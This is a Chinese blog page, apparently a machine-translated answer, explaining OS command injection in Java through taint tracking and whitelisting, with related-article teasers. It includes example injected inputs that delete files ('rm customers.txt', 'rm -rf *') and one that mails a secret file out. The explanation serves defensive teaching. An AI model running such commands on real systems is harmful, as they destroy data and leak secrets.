java os命令注入,可能没有运行时API执行的OS命令注入?

最新推荐文章于 2022-09-20 10:47:19 发布
最新推荐文章于 2022-09-20 10:47:19 发布
阅读量242 收藏
点赞数
文章标签: java os命令注入

String name = request.getBody(); // tainted

String cmd = "grep " + name + " customers.txt"; // also tainted

String cleanName = sanitize(name); // untainted

String cleanerName = validNameMap.get(name); // untainted

String literal = "a literal string"; // untainted

你可以看到,如果request.getBody()回报slim然后grep slim customers.txt是如何安全的。但是,如果用户提供的数据为slim customers.txt; rm,所产生的grep slim customers.txt; rm customers.txtcmd是个坏消息。

sanitize()可能不喜欢的东西去掉一切,但a-zA-Z。

有相当的sanitizin很多范围g例程幼稚,并且不够彻底,这可能是一个攻击媒介 - 所以白名单被认为是更安全的。

如果字符串(S)传递给exec()有污点这是迈向安全的一步。然而,这仍然有危险。试想一下: String command = "/usr/local/bin/myProgram";

String path = "/tmp/inputfile";

createNewFile(path, request.getBody());

runtime.exec(command, path);

现在,无论command和path是污点 - 它们不是由用户提供 - 但我们是通过文件tained数据传递到myProgram,并有一个风险,即myProgram会做一些危险的与数据。

这个最明显的例子是command是/bin/bash,请求正文是rm -rf *或cat secretFile | mail [email protected]。

但有很多更微妙的方式,这可能是有风险的。例如,myprogram可能会使用该文件的内容来构建SQL请求。

您可以在各个地方减轻这些风险。您可以在将数据写入文件之前对数据进行清理,或者您可以在安全模型中明确指出文件内容受到污染,myprogram必须如此处理,并自行解决。

hust2014wt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java序列化与JNDI注入漏洞案例实战
悦分享
08-04 400
序列化主要是提供了一种机制,方便数据在网络之间进行传输,或者独立于程序存储在本地磁盘。序列化的使用场景很广,比如服务器收到请求参数,一种处理方式是一个个解析数据,自己构建处理数据。还有一种就是直接将数据反序列化为对象。当要把对象存储到缓存时,我们可以自己解析对象生成数据保存到缓存,取出时也自己处理数据转换为对象,也可以直接借助语言的序列化机制帮我们将对象序列化为数据存储起来,从缓存里获取数据后直接反序列化转为对象。在这些场景里,很明显序列化机制能极大改善我们的编程体验。Java 序列化基础。...
os 命令注入
weixin_43706468的博客
03-13 2497
命令分隔符注入命令 Java代码也提供一些接口,如Runtime.getRuntime().exec(“command”),System.exec(“command”),调用这两个命令,可以执行一些体统命令。下面给一段代码: Public static void main(String command){ Runtime run = Runtime.getRuntime(); try{ Proce...
os命令执行java
athrenzala的专栏
02-02 394
在lib文件夹同层补录下: 需设计main 进入函数。 server.bat view plaincopy to clipboardprint? @echo off   REM SET UP CLASSPATH   set CLASSPATH=.   FOR %%F IN (lib/*.jar) DO call :updateClassPa
[网络安全学习篇59]:OS命令注入
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-05 2232
OS命令注入 原理及成因 漏洞的危害 相关函数 *system() *exec() *shell_exec() *passthru() *popen() *反引号 漏洞利用 *查看系统文件 *显示当前路径 *写文件 防御方法 DVWA 命令注入 low medium high
java存储过程调用OS命令
csdown1001的博客
07-03 127
1. 先看一下这个目录[oracle@ocean ~]$ pwd/home/oracle[oracle@ocean ~]$ ls -ltotal 8-rw-r--r-- 1 oracle orains 604 Dec 26 ...
OS命令注入】常见OS命令执行函数以及OS命令注入利用实例以及靶场实验—基于DVWA靶场
m0_64378913的博客
06-26 2404
背景:程序员使用脚本语言(如PHP等)开发应用程序过程中,脚本语言开发十分快速、简洁、方便,但是也伴随着一些问题,比如速度慢、无法触及系统底层等。开发的应用时,特殊是企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件),当应用需要调用一些外部程序时就会用到一些系统命令的函数。OS命令注入:当应用在调用这些系统命令函数时,如果将用户的输入作为系统命令的参数拼接到命令中,在没有过滤用户输入的情况下,就会造成命令执行漏洞。条件:漏洞危害:作用:该函数能够将字符串作为OS命令执行,自带输出功能。
Java命令注入_Java OS 命令注入学习笔记
weixin_42127775的博客
02-12 1653
Thursday. September 27, 2018– 6 mins0x01 简介Java 执行系统命令的方法易导致命令注入的危险写法以及如何避免0x02 注意点首先要注意的是,通过 Java执行系统命令时,并不是通过 shell 来执行 (Linux下),因此如果需要用到如 pipeline ( |)、 ;、 &&、 ||等 shell 特性...
操作系统命令注入OS command injection)学习笔记
汗的博客
05-06 5345
笔者burpsuite在线安全学院的OS command injection学习笔记。限于本人水平,笔记质量不是很高,假如有看到的大佬轻喷,很多地方是Google翻译的,还请多多包涵。 文章目录什么是OS命令注入执行任意命令Lab: OS command injection, simple case有用的命令OS盲注使用时间延迟检测OS盲注Lab: Blind OS command inject...
浅谈Shell注入
Ghosind
05-18 4652
通过实际例子介绍Shell注入,并简单地介绍Shell注入的方法及其方法措施。
Java安全之freemaker模版注入
最新发布
知识分享官
09-20 1442
FreeMarker 是一款模板引擎: 即一种基于模板和要改变的数据, 并用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)的通用工具。模板文件存放在Web服务器上,当访问指定模版文件时, FreeMarker会动态转换模板,用最新的数据内容替换模板中${...}的部分,然后返回渲染结果。${...}: FreeMarker将会输出真实的值来替换大括号内的表达式,这样的表达式被称为(插值)
中软java编码规范考试_java编码规范考试题答案
weixin_34795681的博客
02-24 4355
中软java编码规范考试题满分答案B. 无SSL传输通道或者代价太高C. 敏感数据需要持久化长久保存D. 同一信任域内组件间传递13. 下列JDK中的API调用中若使用不当易遭致OS命令注入的是BA. http://www.wendangwang.comng.System.load()B. http://www.wendangwang.comng.Runtime.exec()C. http://w...
OS命令注入---Java
Hollake的博客
05-28 3855
详细请看这篇博客https://blog.csdn.net/JBlock/article/details/78220010。 我这里只是将这篇博客中的有关Java命令注入攻击进行实验验证。 命令分隔符注入命令 Java代码也提供一些接口,如Runtime.getRuntime().exec(“command”),System.exec(“command”),调用这两个命令,可以执行一些系...
java os 命令注入攻击,Web 安全 之 OS command injection
weixin_29323365的博客
03-13 965
OS command injection在本节中,我们将解释什么是操作系统命令注入,描述如何检测和利用此漏洞,为不同的操作系统阐明一些有用的命令和技术,并总结如何防止操作系统命令注入。什么是操作系统命令注入OS 命令注入(也称为 shell 注入)是一个 web 安全漏洞,它允许攻击者在运行应用程序的服务器上执行任意的操作系统命令,这通常会对应用程序及其所有数据造成严重危害。并且,攻击者也常常利用...
一次Java调用OS命令的优化过程实录
weixin_33859504的博客
12-11 200
1前言1.1优化目标人脸识别(FaceRecognition)服务运行在Windows系统的bat文件中,其计算量非常大,运行耗时也比较长(10-20小时),并且在Java程序中使用Runtime执行命令,比直接运行cmd命令耗时更多,因此必须采取必要的手段对整个Server进行优化。主要优化目标是降低Java程序中的执行时间,以提高吞吐率。1.2系统环境1.2.1硬件环境S...
OS命令注入学习笔记
曹世宏的博客
09-22 5455
OS命令注入 调用OS命令引起的安全隐患: Web开发所使用的编程语言中,大多数都能通过Shell执行OS(操作系统)命令。通过Shell执行OS命令时,或者开发中用到的某个方法其内部利用了Shell时,就有可能出现OS命令被任意执行的情况。这种现象被称为OS命令注入。 安全隐患产生的原因: 内部调用OS命令的函数以及系统调用(System Call)中,多数都通过Shell来启动命令。Shell...
注入攻击
weixin_51051051的博客
10-14 3324
注入攻击 OWASP将注入攻击和跨站脚本攻击(XSS)列入网络应用程序十大常见安全风险。实际上,它们会一起出现,因为 XSS 攻击依赖于注入攻击的成功。虽然这是最明显的组合关系,但是注入攻击带来的不仅仅是 XSS。 注入攻击代指一类攻击,它们通过注入数据到一个网络应用程序以期获得执行,亦或是通过非预期的一个方式来执行恶意数据。这种类别的攻击包括跨站脚本攻击(XSS)、SQL 注入攻击、头部注入攻击、日志注入攻击和全路径暴露。当然限于篇幅,这里只是一个简单的介绍。 这类攻击是每个程序员的梦魇。它们数量庞大、攻
使用jdk自带API调用外部接口
酱紫的博客
08-08 670
工具类 import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.UnsupportedEncodingException;...
OS命令注入知识点总结
千寻的博客
02-09 1181
文章目录第一章 原理以及成因第二章·漏洞危害第三章 相关函数第一节 system()第二节 exec()第三节 shell_exec()第四节 passthru()第五节 popen()第六节 反引号第四章 漏洞利用第一节 查看系统文件第二节 显示当前路径第三节写文件第五章 防御方法第六章 DVWA第一节 low命令注入第二节 medium命令注入 第一章 原理以及成因 程序员使用脚本语言(比...
Java执行JS引发命令注入风险
"Java执行JavaScript导致命令执行的问题探讨" 在Java编程中,有时我们需要与JavaScript交互,例如在处理用户输入或者动态执行某些脚本时。然而,这种交互如果不小心处理,可能会引发安全问题,比如命令注入。标题和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值